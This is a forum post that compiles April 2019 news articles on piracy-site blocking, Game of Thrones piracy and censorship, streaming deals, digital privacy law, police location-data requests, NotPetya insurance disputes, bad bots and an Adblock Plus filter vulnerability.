P2P-Zone  

Go Back   P2P-Zone > Peer to Peer
FAQ Members List Calendar Search Today's Posts Mark Forums Read

Peer to Peer The 3rd millenium technology!

Reply
 
Thread Tools Search this Thread Display Modes
Old 17-04-19, 06:17 AM   #1
JackSpratts
 
JackSpratts's Avatar
 
Join Date: May 2001
Location: New England
Posts: 10,013
Default Peer-To-Peer News - The Week In Review - April 20th, ’19

Since 2002


































"Piracy has been the most successful form of distribution worldwide. If someone like you steals my films through the internet or whatever, fine, you have my blessing." – Werner Herzog






































April 20th, 2019




ISPs in India Ordered to Block Pirate Bay, Torrentz2, YTS, and 1337x
Bill Toulas

• The High Court in New Delhi is ordering Indian ISPs to block several pirating websites.
• The court is giving the ISPs an active participation role in the copyright infringement, leaving them no margins for disobedience.
• The order also contains a suggestion for warning pirates and even imposing fines to repeat offenders.

ISPs (Internet Service Providers) in India have been ordered by the High Court of Delhi to block certain torrenting websites that are known to have a history of allowing their visitors to exchange pirated content. The list includes 1337x.to, torrentz2.eu, bmovies.to and (and proxies), fmovies.to (and proxies), rarbg.com (and proxies), thepiratebay.org (and proxies), yts.am (and proxies), torrentz.ht, extrattorent.ag, and torrentmovies.co. As the court order maintains, the ISPs are serving as “inevitable actors in any transmission of infringing data over the internet, and their services are therefore used to infringe copyright.”

There is no doubt that the ISPs in India will comply with the court’s order, and the lengthy justification that presents international examples of blockages of the particular websites goes on for 99 pages. The court is putting Indian ISPs on the position of the copyright infringing accessary, liable for violation of Section 51 of the Copyright Act. The blocking injunction extends to the blockage of new proxies that are sure to pop up, by simply having the plaintiffs (rightsholders) filing a detailed affidavit and submitting it to the ISPs for the imposition of new blockages.

The court goes a step further, assuming that most of the people who are involved in piracy do not know or realize that the shared files are the products of piracy. To remedy this, the court suggests that the possibility of framing a policy under which a warning is issued to the viewers of infringing content should be explored. This means that pirates in India may soon start getting pop-ups or email messages, warning them to cease viewing and downloading the infringing material. The court also suggests that if a user receives the warning and chooses to continue their pirating actions, they should then receive a fine.

Now, the choice of VPN solutions for Indian internet users becomes more imperative than ever, in order to stay safe and protected. Of course, we are not promoting the use of VPN apps for downloading torrents that share pirated content, but if you want to stay anonymous at all times no matter what you choose to do, check out our list with the best VPN for Indians that you have on that part.
https://www.technadu.com/isps-india-...s-1337x/64592/





Prison is Coming: Australians are Warned they Could be JAILED if Caught Illegally Downloading the Final Game of Thrones Season

• Australians looking to illegally download Game of Thrones have been warned
• Potential online pirates have been warned they could face jail time if caught
• Up to 30 per cent of Australians watching Game of Thrones do it illegally

Adam Mccleery

Game of Thrones is considered the most pirated show on television with 1.77million Australians illegally downloading the seventh season in 2017, 7 News reported.

A survey from finder.com.au found 30 per cent of Australians who watch the show downloaded it illegally.

Creative Content Australia executive director Lori Flekser told 7 News the crackdown wasn't just about stopping revenue loss.

'It's not just about the revenue, it is about the overall investment in great screen content that is affected,' she said.

New anti-piracy laws were also introduced after the seventh season of Game of Thrones aired in 2017.

The number of downloads dropped from 29 per cent to 19 per cent when the laws were introduced.

Australian Home Entertainment Distributors Association chief executive Simon Bush said Foxtel, which owns the Australian rights to the hit series, invested heavily in local content and illegal downloads impacted on that investment.

'Foxtel invests in Australian drama and it has paid for the rights to Game of Thrones to support their subscription business model,' he said..

'If we want Australian production, then don't pirate Game of Thrones, just go out and pay your small subscription amount.'

The finder.com.au survey found most states had similar illegal download rates, somewhere between 30 per cent and 40 per cent, while South Australia proved the most trustworthy with only 19 per cent pirating.

A 2018 government report found the number of people illegally downloading content had been gradually dropping.

However, those that were pirating were downloading more illegal content than ever before.

In 2015, 57 per cent of Australians consumed lawful digital content, rising to 67 per cent in 2018.

Many of those surveyed for the government report agreed piracy was wrong and said they would refrain from doing it if content was cheaper.

Of the respondents to the survey who used paid content services, 34 per cent said it was because they don't want to use sites providing illegal content.

Speed and convenience were given as a reason by 49 per cent of respondents, and 36 per cent said paid services provided better quality.

The 2018 online copyright infringement survey garnered 2,453 responses, and showed an increase in streaming and a decrease in downloading.

Meanwhile, in 2017, Sydney man Haidar Majid Salam Al Baghdadi was convicted for content piracy and sentenced to 18 months jail, according to news.com.au.

The court heard Australian Federal Police, Foxtel investigators and Irdeto, a digital platform security business, uncovered a 'criminal network' of content piracy.

Then chief executive of Foxtel, Peter Tonagh, was pleased with the result and said it was justice being served.

'(Foxtel) hopes it sends a strong signal that this type of activity is illegal,' he said.

'Foxtel takes intellectual property theft very seriously as it severely undermines the creative industry including every business and individual that works so hard to deliver us the movies, sport, drama and entertainment we love.'

In its fight against online piracy Foxtel successfully lodged applications to have a number of websites blocked under anti-piracy laws including The Pirate Bay, isohunt and Torrentz.
https://www.dailymail.co.uk/news/art...es-season.html





Multichoice Says More than 2 Million People are Pirating Shows Available on DStv in South Africa
Staff Writer

Icasa published its draft findings in respect of the Inquiry into Subscription Television Broadcasting Services on 12 April 2019.

The 184-page document is full of commentary from South Africa’s biggest media players, with some of the most interesting information coming from Multichoice.

Multichoice said that it has not only seen increased competition from the emergence of legitimate providers – such as Netflix – but also from piracy.

“The piracy of electronic audio-visual content is on the rise and posing a huge threat to traditional Pay TV services,” it said.

“For example, MultiChoice estimates that more than two million people view pirated versions of the series and movies available on DStv in South Africa.

“Piracy in sports is also pervasive. The reality is that piracy is a further competitive constraint on Pay TV services in South Africa.”

However, Icasa said that it wasn’t sure how much piracy actually constrained subscription broadcasting as claimed by Multichoice.

“The authority considered the advent of piracy and whether it constrains subscription broadcasting as claimed by Multichoice,” it said.

“It came to the conclusion that since there are various efforts to stem the tide of piracy not only in South Africa but globally, it does not offer a strong competitive constraint on subscription television.”
https://businesstech.co.za/news/medi...-south-africa/





Game of Thrones Season 8 Episode 1 Leaked Online by Tamilrockers

HBO's popular show Game of Thrones is the latest victim of piracy website Tamilrockers.
Entertainment Desk

The first episode of Game of Thrones’ final season has been leaked online by Tamilrockers. The notorious piracy website has been a pain for film and television production companies. It began by pirating South Indian movies, but now uploads high-quality versions of Bollywood and Hollywood movies and shows.

This is despite the stringent action that has been taken against the site by the court and police. After a plea by Lyca Productions, the Madras High Court ordered all internet service providers to block Tamilrockers.

Despite these attempts, Tamilrockers continues to operate.

Game of Thrones’ final season will wrap up the two major conflicts of the show. The first one is the struggle for the Iron Throne and the other is the upcoming war between the Night King and his Army of the Dead vs the living people of Westeros.

Major players with a few exceptions like Cersei Lannister have gathered at Winterfell to make a stand against the invading undead army led by the Night King and his White Walker lieutenants.

The Night King’s ultimate goal is to obliterate every living thing on the continent. The commanders on the other side are Jon Snow and Daenerys Targaryen. The one thing that can work in favour of Jon and Dany is the two surviving dragons.

Game of Thrones airs on Star World in India. It also streams on Hotstar.
https://indianexpress.com/article/en...ckers-5675826/





Chinese Game of Throne Fans Resigned to Final Season Censorship

• Medieval drama is known for its X-rated content, but audiences in China are unlikely to see much sex or violence
• Scenes of nudity and swearing were cut from earlier instalments of the hit HBO series, which is broadcast by Tencent Video in China

Sarah Zheng

Winter is coming for fans of the hit television series Game of Thrones, with the final season set to hit screens around the world after a near two-year hiatus, but those watching inside China are also bracing for the chill of censorship.

Despite being name-dropped by Chinese Premier Li Keqiang last week before travelling to Dubrovnik – one of the show’s filming locations – the final instalment of the fantasy drama known for its explicit scenes of sex and violence is unlikely to be seen in its entirety in the Middle Kingdom.

Season 8 will be streamed online on Monday morning by Tencent Video, a unit of Chinese tech giant Tencent, which gained exclusive distribution rights to the show in 2014 from HBO, the show’s American network producer.

HBO’s website has been blocked in mainland China since June, after English comedian and broadcaster cracked jokes about Chinese President Xi Jinping on his satirical television show Last Week Tonight.

Anticipation for the new Game of Thrones season in China is nonetheless soaring, with a discussion topic on Weibo – China’s Twitter-like platform – racking up 96 million views on Sunday afternoon. But fans know all too well that the show is unlikely to escape the censor’s scissors.

In the opening episode of season 7, for instance, parts of a scene in which an Archmaester slices open a corpse and asks steward Samwell Tarley to weigh its heart were omitted, and a line of dialogue spoken by Sandor Clegane to Lord Beric Dondarrion in which he says: “If he is so all powerful, why doesn’t he just tell you what the f*** he wants” was also removed.

Audiences in China were similarly deprived of a scene in the very first season of Game of Thrones in which brother and sister Viserys and Daenerys Targaryen are seen together as she prepares to take a bath. In the unedited version shown on HBO, Daenerys is seen completely naked.

“I’m begging Father Tencent not to censor too much, thank you,” one Weibo user wrote.

“This censored version is not interesting,” said another. “I would pay money to watch the uncut version.”

In recent years, Chinese authorities have ramped up the pressure on the television and film industries to clean up content they deem vulgar or politically incorrect. This has led to some serious censorship of foreign productions.

Recent examples include the removal of scenes of smashed heads and bare flesh from the American superhero film Logan, and the apparent manipulation of a scene in Oscar-winner The Shape of Water so that a naked woman is made to appear to be wearing clothes.

Locally produced content has been equally hard hit, with clean-up campaigns targeting the internet and broadcast media resulting in the blurring of images showing men wearing earrings or people smoking, and the removal of any scenes of a sexual, violent or satirical nature.

In a bid to get around the censorship, many Chinese Game of Thrones fans have turned to virtual private networks and torrent download websites to access unexpurgated versions of their favourite episodes.

The restrictions in China are not bad news for everyone, however. Thanks in part to it holding exclusive rights to Game of Thrones, Tencent Video saw its registered subscriber base expand by 58 per cent in the final quarter of last year to 89 million. It is now the country’s largest video streaming platform. The company did not immediately respond to requests for comment on Sunday.

Despite the anticipated cuts, many social media users remained upbeat about the upcoming finale to the medieval drama about feuding dynasties, suggesting the trimmed episodes they got to see might actually put them at an advantage.

“Those of us in China will know the ending to the show before people abroad,” one Weibo user joked. “Does that mean we can leak spoilers to everyone else?”

Another was more stoical about the whole thing, saying: “As long as the overall plot feeling is not censored, it is not terrible.”
https://www.scmp.com/news/china/soci...son-censorship





AT&T May Have Just Signaled the End of Hulu as You Know it Today

AT&T just sold its stake, leaving Disney with overwhelming control
Chaim Gartenberg

Hulu might look very different a year from now. AT&T has sold its roughly 10 percent stake in Hulu back to the streaming service today for $1.43 billion dollars, making it that much more likely that Hulu will become a Disney-centric service in the future.

Just last year, Hulu was still divided evenly between Disney, Fox, and Comcast — each owning a 30 percent cut of the company — alongside AT&T’s roughly 10 percent stake. But Disney gained a controlling interest in Hulu when it bought Fox, and the AT&T sale means Disney now owns a staggering 66 percent of the service, with Comcast owning the remaining 33 percent.

But it’s not just about the money and the percent-ownership; Disney gaining even more control over Hulu could also mean a radical shift in what Hulu even is. Right now, the service offers streaming content from a huge range of providers, including Comcast-owned NBC and Universal, and AT&T-owned networks like TBS and TNT.

Now that AT&T no longer has skin in the game, it’s easy to imagine a future where the company pulls its shows entirely in favor of its own streaming efforts. (AT&T now has its own video empire after purchasing Time Warner, after all.) And if Comcast follows suit, it could leave Hulu as an exclusively Disney service that compliments the upcoming $7-a-month Disney+. Disney has even hinted as much, with the company highlighting in the past few days the different roles it intends for Hulu and Disney+, with Hulu offering more mature content, and even the potential for a joint bundle. (Perhaps AT&T saw the writing on the wall when Disney assumed control.)

While that’s good for Disney, it’s a decidedly less appealing future for consumers, who could see one of the last streaming services to offer cross-network content get fractured into even more monthly fees to watch all your shows.
https://www.theverge.com/2019/4/15/1...trol-streaming





Starz Apologizes for Taking Down Tweets to Torrentfreak Article Following Security Breach
Janko Roettgers

Updated. Facing a backlash over overzealous copyright enforcement, Starz issued an apology on Monday for inadvertently taking down tweets to articles about TV show piracy. The TV network said in a statement that it recently incurred a security breach, which prompted the company to hire a third party for copyright enforcement.

“The techniques and technologies employed in these efforts are not always perfect, and as such it appears that in this case, some posts were inadvertently caught up in the sweep that may fall outside the DMCA guidelines,” the network said in a statement.

“That was never our intention and we apologize to those who were incorrectly targeted. We are in the process of reviewing all of the impacted posts as well as the scope and procedure for the previous takedowns and are working with our vendors to reinstate any such content that was inappropriately targeted for removal.”

The apology came in response to a series of takedowns that started last week. Torrentfreak, a long-established website reporting on P2P and piracy, ran a story about a new flood of TV show leaks. The story mentioned that unreleased episodes from a number of shows, including Starz titles like “American Gods,” had appeared on piracy sites.

Torrentfreak didn’t link to any leaked episodes, or even mention the sites that were hosting those leaks. The site did identify a New York-based magazine editor as a possible source of the leaks, and also included a handful of screenshots in its reporting.

After Torrentfreak first published the story, Starz used a social media agency to have Twitter take down tweets to the story. Torrentfreak protested, and wrote a follow-up article about the takedowns — and promptly had tweets to that story taken down as well.

Some of the tweets in question, including Torrentfreak’s original tweet linking to its initial story, were reinstated Monday afternoon.

The tweet takedowns have been widely criticized, with the Electronic Frontier Foundation and others coming to Torrentfreak’s support. “The article reported that there are people on the internet infringing copyright, but that’s a far cry from being an infringement itself,” the digital rights group said in a tweet that also linked to Torrentfreak’s original story — which resulted in another DMCA takedown request.

A number of journalists also saw their tweets about the affair disappear, including Columbia Journalism Review chief digital writer Mathew Ingram, who called the takedowns “Kafka-esque.”

This is Kafka-esque: I posted yesterday about Twitter removing a tweet from TorrrentFreak because it contained a link to an article about pirated copies of Starz shows appearing online (with no links to said content). Twitter has now removed my tweet linking to that story pic.twitter.com/pKF4VCRSit

— Mathew Ingram (@mathewi) April 14, 2019


The Digital Millennium Copyright Act’s safe harbor provisions force a platform like Twitter to take down allegedly infringing content after receiving a proper takedown notice from or on behalf of a copyright owner, but also allow users to appeal such takedowns. Ingram said he had appealed the takedown, but not received a response from Twitter yet.

Some argued on Monday that the episode showed that platforms make it too hard for users to object takedowns. Twitter didn’t immediately respond to a request for comment.
https://variety.com/2019/digital/new...gy-1203189742/





Utah Bans Police From Searching Digital Data Without A Warrant, Closes Fourth Amendment Loophole
Nick Sibilla

Alexa, get a warrant.

In a major win for digital privacy, Utah became the first state in the nation to ban warrantless searches of electronic data. Under the Electronic Information or Data Privacy Act (HB 57), state law enforcement can only access someone’s transmitted or stored digital data (including writing, images, and audio) if a court issues a search warrant based on probable cause. Simply put, the act ensures that search engines, email providers, social media, cloud storage, and any other third-party “electronic communications service” or “remote computing service” are fully protected under the Fourth Amendment (and its equivalent in the Utah Constitution).

HB 57 also contains provisions that promote government transparency and accountability. In most cases, once agencies execute a warrant, they must then notify owners within 14 days that their data has been searched. Even more critically, HB 57 will prevent the government from using illegally obtained digital data as evidence in court.

In a concession to law enforcement, the act will let police obtain location-tracking information or subscriber data without a warrant if there’s an “imminent risk” of death, serious physical injury, sexual abuse, livestreamed sexual exploitation, kidnapping, or human trafficking.

Backed by the ACLU of Utah and the Libertas Institute, the act went through five different substitute versions before it was finally approved—without a single vote against it—last month. HB 57 is slated to take effect in mid-May.

Ensuring that the Fourth Amendment is still relevant can sound like an obvious, common-sense reform (and it is). Yet Utah’s new law is also a surprisingly radical break from the status quo. Thanks to the “third-party doctrine,” in 49 states and on the federal level, the government can access a striking amount of private data without a search warrant, simply by working through third parties.

Back in the late 1970s, the U.S. Supreme Court issued a pair of decisions (United States v. Miller and Smith v. Maryland) that upheld the warrantless searches of bank records and dialed phone numbers. In both cases, the court ruled that the defendants’ Fourth Amendment rights were not violated because they had no “legitimate expectation of privacy,” since they had “voluntarily conveyed” the information at hand to third parties.

The third-party doctrine, in other words, opened a massive loophole that bypasses the Fourth Amendment, letting the government collect reams of very personal information. Unfortunately, HB 57 does not extend to medical or financial records held by third parties, leaving Utahns still vulnerable to warrantless snooping.

Last year, the Supreme Court narrowed the third-party doctrine in Carpenter v. United States. By a margin of 5-4, the court ruled that accessing time-stamped mobile phone records known as “cell-site location information” (CSLI) qualifies as a search under the Fourth Amendment. “A person does not surrender all Fourth Amendment protection by venturing into the public sphere,” Chief Justice John Roberts wrote for the majority.

“When the Government tracks the location of a cell phone it achieves near perfect surveillance,” Roberts warned, “as if it had attached an ankle monitor to the phone’s user.” If the government wants to access CSLI, the chief justice bluntly told them to “get a warrant.”

In Carpenter, Roberts acknowledged that CSLI “does not fit neatly under existing precedents,” since it’s a form of “personal location information maintained by a third party.” As a result, the court “decline[d] to extend Smith and Miller.” “Given the unique nature of cell phone location records,” he wrote, “the fact that the information is held by a third party does not by itself overcome the user’s claim to Fourth Amendment protection.”

First, CSLI is automatically recorded any time someone uses their phone, without any input from the user, which undermines the notion that CSLI is “voluntarily” handed over. Moreover, phones have become so embedded and prevalent that “carrying one is indispensable to participation in modern society,” Roberts added.

Second, “seismic shifts in digital technology” mean that “there is a world of difference between the limited types of personal information addressed in Smith and Miller and the exhaustive chronicle of location information casually collected by wireless carriers today.” “With just the click of a button,” Roberts noted, “the Government can access each carrier’s deep repository of historical location information at practically no expense.” In the Carpenter case, the government obtained nearly 13,000 location points over 127 days when it investigated Timothy Carpenter for a series of robberies in Detroit.

Roberts convincingly explained why the third-party doctrine is a poor fit for CSLI. Yet even though many of those detailed reasons also apply to other forms of electronic data, the chief justice was adamant that his decision was a “narrow one.” Carpenter explicitly states that it does not directly consider the constitutionality of the government obtaining less than seven days’ worth of cell-site records, real-time CSLI, “conventional surveillance techniques and tools,” or business records, though many of those law enforcement tools are now covered by HB 57 in Utah.

While Carpenter’s long-term impact on digital data will largely depend on how the Supreme Court reconciles the decision with its woefully outdated precedents, in Utah, the Electronic Information or Data Privacy Act has already struck a major blow against the third-party doctrine. Utah’s sweeping reform warrants becoming a model for other states.
https://www.forbes.com/sites/nicksib...ment-loophole/





Law Enforcement Taps Google's Sensorvault for Location Data, Report Says

The database is for targeting ads and seeing how effective they are. But it's reportedly also been a treasure trove for police.
Richard Nieva

When law enforcement investigations get cold, there's a source authorities can turn to for location data that could produce new leads: Google.

Police have used information from the search giant's Sensorvault database to aid in criminal cases across the country, according to a report Saturday by The New York Times. The database has detailed location records from hundreds of millions of phones around the world, the report said. It's meant to collect information on the users of Google's products so the company can better target them with ads, and see how effective those ads are.

But police have been tapping into the database to help find missing pieces in investigations. Law enforcement can get "geofence" warrants seeking location data. Those kinds of requests have spiked in the last six months, and the company has received as many as 180 requests in one week, according to the report.

Google declined to answer specific questions about Sensorvault but said the company has narrowed how much identifiable information it gives police.

"We vigorously protect the privacy of our users while supporting the important work of law enforcement," Richard Salgado, Google's director of law enforcement and information security, said in a statement. "We have created a new process for these specific requests designed to honor our legal obligations while narrowing the scope of data disclosed and only producing information that identifies specific users where legally required."

For geofence warrants, police carve out a specific area and time period, and Google can gather information from Sensorvault about the devices that were present during that window, according to the report. The information is anonymous, but police can analyze it and narrow it down to a few devices they think might be relevant to the investigation. Then Google reveals those users' names and other data, according to the Times.

News of the law enforcement tactic comes as the tech industry faces intense scrutiny over its data collection practices. Facebook has been in the hot seat since its Cambridge Analytica scandal, in which user information from tens of millions of people was misused by a third party. Google has also been subjected to scrutiny after the AP reported last year that Google tracked people's location even after they'd turned off location-sharing on their phones.

It's not uncommon for law enforcement to seek help from tech companies during investigations. But the use of Sensorvault data has raised concerns about innocent people being implicated. For example, the Times interviewed a man who was arrested last year in a murder investigation after Google's data had reportedly landed him on the police's radar. But he was released from jail after a week, when investigators pinpointed and arrested another suspect.

Facebook wants to show good amid scandals: The social network updates its tools for blood donations, nonprofits and mentorships.

Everything Apple announced: What we know about Apple's TV content and service, credit card, game subscription service and more.
https://www.cnet.com/news/law-enforc...a-report-says/





Big Tech Lobbying Gutted a Bill That Would Ban Recording You Without Consent
Rob Dozier

The Illinois Keep Internet Devices Safe Act would have empowered average people to sue big companies for recording them without consent, but industry association lobbying defanged it.

An Illinois bill that sought to empower average people to file lawsuits against tech companies for recording them without their knowledge via microphone-enabled devices was defanged this week after lobbying from trade associations representing Silicon Valley giants.

On Wednesday, the Illinois State Senate passed the Keep Internet Devices Safe Act, a bill that would ban manufacturers of devices that can record audio from doing so remotely without disclosing it to the customer. But after lobbying from trade associations that represent the interests of Google, Amazon—makers of the microphone-enabled Google Home and Alexa smart speakers, respectively—and Microsoft, among other companies, the interests of big tech won out.

In the bill’s original form, users could file a complaint with the Illinois Attorney General’s office that could lead to penalties of up to $50,000. But after technology trade associations, led by the Internet Association objected, claimed that the state’s definition of a “digital device” was too broad, and that the Act would lead to “private litigation which can lead to frivolous class action litigation,” the bill was scaled back.

In its current, neutered form, the bill provides exclusive authority to the Attorney General to enforce the Act, which means regular citizens won’t be able to bring forward a case regarding tech giants recording them in their homes.

Matt Stoller, a research fellow at Open Markets Institute, an anti-monopoly advocacy group, shared the lobbying groups’ statements on Twitter.

Just this week, a report from Bloomberg detailed how Amazon employs thousands of people around the world to listen to commands spoken to its line of Echo speakers in order to improve its Alexa digital assistant, sometimes even after users opt out of having their data used in the program. Amazon workers reportedly heard the terms people were searching for online, private conversations, and unsettling situations like a potential assault—all connected to the user’s Amazon ID number and personally identifying information like their name.

The bill arrived in Illinois’ House of Representatives today, but unless Illinois’ Attorney General makes privacy violations an active priority, it’s not likely the bill will provide much more protection for consumers.
https://motherboard.vice.com/en_us/a...ithout-consent





Big Companies Thought Insurance Covered a Cyberattack. They May Be Wrong.
Adam Satariano and Nicole Perlroth

Within days of a cyberattack, warehouses of the snack foods company Mondelez International filled with a backlog of Oreo cookies and Ritz crackers.

Mondelez, owner of dozens of well-known food brands like Cadbury chocolate and Philadelphia cream cheese, was one of the hundreds of companies struck by the so-called NotPetya cyberstrike in 2017. Laptops froze suddenly as Mondelez employees worked at their desks. Email was unavailable, as was access to files on the corporate network. Logistics software that orchestrates deliveries and tracks invoices crashed.

Even with teams working around the clock, it was weeks before Mondelez recovered. Once the lost orders were tallied and the computer equipment was replaced, its financial hit was more than $100 million, according to court documents.

After the ordeal, executives at the company took some solace in knowing that insurance would help cover the costs. Or so they thought.

Mondelez’s insurer, Zurich Insurance, said it would not be sending a reimbursement check. It cited a common, but rarely used, clause in insurance contracts: the “war exclusion,” which protects insurers from being saddled with costs related to damage from war.

Mondelez was deemed collateral damage in a cyberwar.

The 2017 attack was a watershed moment for the insurance industry. Since then, insurers have been applying the war exemption to avoid claims related to digital attacks. In addition to Mondelez, the pharmaceutical giant Merck said insurers had denied claims after the NotPetya attack hit its sales research, sales and manufacturing operations, causing nearly $700 million in damage.

When the United States government assigned responsibility for NotPetya to Russia in 2018, insurers were provided with a justification for refusing to cover the damage. Just as they wouldn’t be liable if a bomb blew up a corporate building during an armed conflict, they claim not to be responsible when a state-backed hack strikes a computer network.

The disputes ares playing out in court. In a closely watched legal battle, Mondelez sued Zurich Insurance last year for a breach of contract in an Illinois court, and Merck filed a similar suit in New Jersey in August. Merck sued more than 20 insurers that rejected claims related to the NotPetya attack, including several that cited the war exemption. The two cases could take years to resolve.

The legal fights will set a precedent about who pays when businesses are hit by a cyberattack blamed on a foreign government. The cases have broader implications for government officials, who have increasingly taken a bolder approach to naming-and-shaming state sponsors of cyberattacks, but now risk becoming enmeshed in corporate disputes by giving insurance companies a rationale to deny claims.

“You’re running a huge risk that cyberinsurance in the future will be worthless,” said Ariel Levite, a senior fellow at the Carnegie Endowment for International Peace, who has written about the case. But he said the insurance industry’s position on NotPetya is “not entirely frivolous, because it is widely believed that the Russians had been behind the attack.”

Mondelez said in a statement that while its business had recovered quickly from the attack, Zurich Insurance was responsible for honoring an insurance policy that explicitly covers cyber events. The company added that it did not believe the war exemption clause fit the circumstances.

Zurich Insurance, based in Switzerland, and Merck declined to comment because of the active litigation. But court documents, public filings and interviews with people familiar with cases provided details about the disputes.

Cyberattacks have created a unique challenge for insurers. Traditional practices, like not covering multiple buildings in the same neighborhood to avoid the risk of, say, a big fire don’t apply. Malware moves fast and unpredictably, leaving an expensive trail of collateral damage.

“It cuts across practically every type of business activity,” Mr. Levite said. The risk, he said, “no longer can be contained in this interconnected world.”

NotPetya — which picked up the odd name because security researchers initially confused it with a piece of so-called ransomware called Petya — was a vivid example. It was also a powerful assault on computer networks that incorporated a stolen National Security Agency cyberweapon.

American officials tied the attack to Russia and its conflict with Ukraine. The original target was a Ukrainian tax software maker and its Ukrainian customers. In just 24 hours, NotPetya wiped clean 10 percent of all computers in Ukraine, paralyzing networks at banks, gas stations, hospitals, airports, power companies and nearly every government agency, and shutting down the radiation monitors at the old Chernobyl nuclear power plant.

The attack made its way to the software maker’s global clients, eventually entangling Mondelez and Merck, as well as the Danish shipping conglomerate Maersk and FedEx’s European subsidiary. It hit even Russia’s state-owned oil giant, Rosneft.

In a statement in 2018, the White House described NotPetya as “part of the Kremlin’s ongoing effort to destabilize Ukraine” and said it had demonstrated “ever more clearly Russia’s involvement in the ongoing conflict.”

Many insurance companies sell cyber coverage, but the policies are often written narrowly to cover costs related to the loss of customer data, such as helping a company provide credit checks or cover legal bills.

Mondelez, a former unit of Kraft Foods, argues that its property insurance package should cover the losses from the NotPetya attack. In court filings, Mondelez said its policy had been updated in 2016 to include losses caused by “the malicious introduction of a machine code or instruction.”

The company lost 1,700 servers and 24,000 laptops. Employees were left to communicate through WhatsApp, and executives posted updates on Yammer, a social network used by companies.

Damage from NotPetya spread all the way to Hobart, Tasmania, where computers in a Cadbury factory displayed so-called ransomware messages that demanded $300 in Bitcoin.

Courts often rule against insurers that try to apply the wartime exemption. After hijackers destroyed a Pan Am airliner in 1970, a United States court rejected Aetna’s attempt, determining that the action was criminal, not an act of war. In 1983, a judge ruled that Holiday Inn’s insurance policy covered damage from the civil war in Lebanon.

In the Mondelez and Merck lawsuits, the central question is whether the government’s attribution of the NotPetya attack to Russia meets the bar for the war exclusion.

Risk industry experts say cyberwar is still largely undefined. Attribution can be difficult when attacks come from groups with unofficial links to a state and the blamed government denies involvement.

“We still don’t have a clear idea of what cyberwar actually looks like,” said Jake Olcott, vice president at BitSight Technologies, a cyber risk adviser. “That is one of the struggles in this case. No one has said this was an all-out cyberwar by Russia.”

In the past, American officials were reluctant to qualify cyberattacks as cyberwar, fearing the term could provoke an escalation. President Barack Obama, for example, was careful to say the aggressive North Korean cyberattack on Sony Entertainment in 2014, which destroyed more than 70 percent of Sony’s computer servers, was an act of “cybervandalism.”

That label was sharply criticized by Senators John McCain and Lindsey Graham, who called the hack a “new form of warfare” and “terrorism.”

The description of the Sony attack was deliberate, said John Carlin, the assistant attorney general at the Justice Department at the time. In an interview, he said the Obama administration had worried, in part, that the use of “cyberwar” would have triggered the liability exclusions and fine print that Mondelez is now challenging in court.

Scott Kannry, the chief executive of the risk assessment firm Axio Global, said the insurance industry was watching the Mondelez case closely because many policies were created before cyberattacks were such an urgent risk.

“You have insurers who are sitting on insurance policies that were never underwritten or understood to cover cyber risk,” Mr. Kannry said. “Zurich didn’t underwrite the policy with the idea that a cyber event would cause the kind of losses that happened to Mondelez. Nobody is at war with Mondelez.”

Many insurance companies are rethinking their coverage. Since the lawsuits were filed, Shannan Fort, who specializes in cyberinsurance for Aon, one of the world’s largest insurance brokers, has been fielding calls from companies scrambling to be sure they’ll be safe if attacked, she said.

“I don’t want to scare people, but if a country or nation state attacks a very specific segment, like national infrastructure, is that cyberterrorism or is that an act of war?” Ms. Fort asked. “There is still a bit of gray area.”

Ty Sagalow, a former chief operating officer at the insurance giant A.I.G., helped pioneer the market for cyber risk insurance nearly two decades ago. He said his team had contemplated a “Cyber Pearl Harbor” attack not unlike the NotPetya attack.

“Cyberwar and cyberterrorism has always been a tricky area,” Mr. Sagalow said. Insurers risk abusing the war exclusion by not paying claims, he said, particularly when an attack “can hit companies that were not the original target of violence.”

Collateral damage from attacks that get out of control are going to become more and more common, he added. “That is what cyber is today,” Mr. Sagalow said. “And if you don’t like it, you shouldn’t be in the business.”
https://www.nytimes.com/2019/04/15/t...ya-attack.html





Bad Bots Now Make up 20 Percent of Web Traffic

Mimicking human mouse movements is only one of many tactics used to fly under the radar.
Charlie Osborne

Bots can be valuable tools for webmasters seeking additional visibility into their domains but malicious variants are a constant headache for online services.

So-called "bad bots" can be tasked with performing denial-of-service (DoS) attacks, they can scrape and steal data, they may be used to automatically publish fake content or reviews, and also skew advertising and visitor metrics.

Bots, in general, are estimated to make up roughly 37.9 percent of all Internet traffic. In 2018, one in five website requests -- 20.4 percent -- of traffic was generated by bad bots alone.

According to Distil Networks' latest bot report, "Bad Bot Report 2019: The Bot Arms Race Continues," the financial sector is the main target for such activity, followed by ticketing, the education sector, government websites, and gambling.

Based on the analysis of hundreds of billions of bad bot requests over 2018, simple bots, which are easy to detect and defend against, accounted for 26.4 percent of bad bot traffic. Meanwhile, 52.5 percent came from those considered to be "moderately" sophisticated, equipped with the capability to use headless browser software as well as JavaScript to conduct illicit activities.

A total of 73.6 percent of bad bots are classified as Advanced Persistent Bots (APBs), which are able to cycle through random IP addresses, switch their digital identities, and mimic human behavior.

An example of this is mouse mimicry, in which the bot is able to simulate mouse events a genuine visitor may perform on a website domain. These tactics are used to try and appear as a legitimate user for the purposes of ad fraud, as well as brute-force attacks against online accounts, competitive data mining, transaction fraud, spam, and phishing campaigns.

Amazon is the leading ISP for bad bot traffic origins. In total, 18 percent of bad bot traffic came from the firm's services, a jump from 10.62 percent in 2017.

Almost 50 percent of bad bots use Google Chrome as their user agent and 73.6 percent of bad bot traffic was recorded as originating from data centers, down from 82.7 percent in 2017.

The United States outstrips all other countries as a generator of bad bots. In total, 53.4 percent of bad bot traffic came from the US, followed by the Netherlands and China. The most blocked country by IP is Russia, together with Ukraine and India.

"Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used today, such as mimicking mouse movements, are more human-like than ever before," said Tiffany Olson Kleemann, CEO of Distil Networks. "As sophistication strengthens, so too does the breadth of industries impacted by bad bots. When critical online activity, like voter registration, can be compromised as a result of bad bot activity, it no longer becomes a challenge to tackle tomorrow. Now is the time to understand what bots are capable of and now is the time to act."
https://www.zdnet.com/article/bad-bo...f-web-traffic/





Adblock Plus Filter Lists May Execute Arbitrary Code in Web Pages
Armin Sebastian

A new version of Adblock Plus was released on July 17, 2018. Version 3.2 introduced a new filter option for rewriting requests. A day later AdBlock followed suit and released support for the new filter option. uBlock, being owned by AdBlock, also implemented the feature.

Under certain conditions the $rewrite filter option enables filter list maintainers to inject arbitrary code in web pages.

The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.

